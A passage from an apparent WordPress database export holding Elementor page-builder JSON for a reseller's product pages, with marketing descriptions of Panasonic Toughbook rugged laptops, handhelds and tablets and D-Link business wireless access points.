20\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"5\\\" ]<\\/span><\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":79},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, upgraded rear camera and Wi-Fi chipset, a quick-charging, user-replaceable full-shift battery and a Near Field Communications option. With a fully rugged and sealed design, the thin and lightweight TOUGHPAD\\u00a0FZ-B2 is built for long-lasting durability where others fail.<\\/p><p>[maxbutton id=\\\"5\\\" ]<\\/p><\\/div>\",\"align\":\"justify\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3626,1480,'_elementor_edit_mode','builder'),(3439,1480,'_elementor_template_type','post'),(3546,2647,'_wp_attached_file','2018/12/DES-1510-52-510x600.jpg'),(3441,1442,'_elementor_template_type','post'),(3442,1480,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 